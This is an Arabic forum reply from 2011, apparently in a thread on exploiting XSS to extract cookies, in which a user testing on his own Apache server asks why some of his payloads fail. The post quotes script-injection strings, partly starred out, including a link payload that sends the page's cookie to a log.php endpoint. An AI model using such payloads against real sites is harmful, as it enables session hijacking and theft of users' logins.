يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:
انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:
كود:
'"--></style></script>***************("Www.VBspiders.com")</script>
وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:
ولكن لما كتبت الامر هذا :
كود:
'"--></style></script>***************(4444444)</script>
وضغطت انتر طلع التنبيه وكل اشي تمام...
ولكن لما اجيت احط هذا الامر:
كود:
"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>
ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟
تحياتي
08-21-2011, 11:30 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
العرض الشجري